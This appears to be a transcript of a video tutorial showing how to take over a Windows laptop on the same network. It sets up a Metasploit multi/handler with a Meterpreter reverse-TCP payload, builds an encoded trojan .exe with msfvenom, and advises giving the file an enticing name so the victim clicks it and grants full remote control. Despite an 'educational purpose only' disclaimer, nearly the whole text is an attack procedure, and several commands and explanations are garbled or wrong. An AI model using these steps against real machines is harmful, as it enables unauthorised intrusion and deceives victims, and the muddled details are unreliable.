Welcome. In this video I am going to show you how you can access a Windows laptop in which you are connected with it in the same network. First, I'm going to advise that to do this particular system or security breach, you are supposed to have an advanced operating system like Kali Linux. If you connect that Kali Linux to a particular network and the targeted computer also, which in this case we are considering a Windows laptop, all of it should be in the same network. If all of these are in the same network, then we are ready to move forward. So in this video I am going to explain to you the different command procedures and steps in which you are going to follow in order to do this particular system attack. First, you open your terminal from your Kali Linux and input the command msf console. The msf console is going to be employed. The next thing is that you are supposed to activate or start a Postgres service. So for you to start a particular PostgreSQL service, open another command, another terminal, and input the command service space PostgreSQL space start. The PostgreSQL is going to start its service and it's going to load. Now we are ready now to move forward to the next stage. The next stage is we are going to use some exploit command. So in the previous terminal, the first terminal you open, you input the command use space exploit /multi/handler and you press enter. It is going to import the multi-handler from the terminal. Now if you have employed that handler, you now need to see the different options that are there existing in the network. So you are going to type show space options and it is going to give you the different targets that you are supposed to attack. Now first of all, we cannot attack the target if we don't know the particular IP configuration or the particular IP address of that targeted computer. How are we going to know that? The good thing is that all of us are connected in the same network. Before we go to that, we are going to set a payload for that particular action. Now we are going to enter the command set space capital on payload capital of space Windows /metapreter /reverse_TCP, and it is going to open up that particular service. Now we can check the options now. If there was nothing that show at that particular point, hope we have employed so the metapreter command. You go check show set space options and it is going to show us the different accounts and the different laptops, Windows laptops that are there and which we are ready now to attack. But we cannot attack if we don't know the particular IP address of it. So what do? Open another terminal, and on the command line type ifconfig and it is going to show now the net mask, the IP address and the INET of where you are in the particular network. We need to do something else to do an attack. We need now, let's inject something. Let's call a particular header file with the command msfvenom space.h, and it is going to load a command that we need to follow up. Now go back to the previous terminal and put now when this opens, you are going to see now the host computer and you are going to see now the network mask in which you want to do your particular security breach. Now we need two things to do that. We need to know the localhost address and also we need to know the port address for that particular localhost. So now what do? We have to set the localhost address. Now you go to the command, you input the command set space cap lock on L hosts space. Now you put now the IP address that you copied from the previous terminal, which has INET, which is an INET address as indicated. Copy it from that previous terminal and paste it here. Now when you paste it here, you are now assigning that IP address to that targeted machine that you want to attack. Now we press enter. Now check the options. When you check the options, you are now going to see now that the local host is now having an IP address that has been assigned to it, because all of us rather, are on the same network. Now the next thing that we are going to do on that terminal is that input the command msf venom space .p space windows / metapreter / reverse underscore TCP space cap lock on L hosts equal to, you put now that IP address that you copy, that INET address that you copy, space L port, you put it, which was already given in most cases 4444 space -f space exe space -e. Now we'll need the particular version on which that operating system is. Is it a 64-bit operating system? Is it a 32-bit operating system? If it's a 32-bit operating system, we put times 86. If it is a 64-bit operating system, we put times 64 / shikata underscore GA underscore NEI space -I space 10 for 10 increment. Now you are going now to give now the directory in which you want to save this particular .exe file, because this is an exe file that we have created. You give now the directory that you want to store it. It should be on that machine that you are targeted. That is where it's going to be stored. Now you press enter. Now we now need to exploit this particular .exe that we have used to continue our accessing. Now you enter exploit. When you launch exploit, it is going to be loading. You are going to see loading on the terminal, but it will not be complete until the client or the targeted host clicks that .exe file. That .exe file should have a very good name. Some graphical interface can be attached to it. You can paste something that is going to attract the user. For example, if I was the one and you put money bank, I will be forced to click it. So when the user clicks it, now your exploit now is now open, and you have full access to the targeted machine, and you can do anything on the targeted machine. You can shut it down, you can reboot it, you can create files on the machine, you can read files, you can delete files, you can change directory, and you can do a whole bunch of stuff. So a complete video, on the live video on how we are going to do all of what I have explained here, is on my YouTube. So you're going to subscribe to my YouTube channel and follow it and try to do it. It is all for educational purpose only. You bear responsibility of any actions as a result of doing this. Don't test it on somebody's machine. It is for educational purpose only. Thank you. Subscribe to my YouTube channel, and you are going to get more of the videos.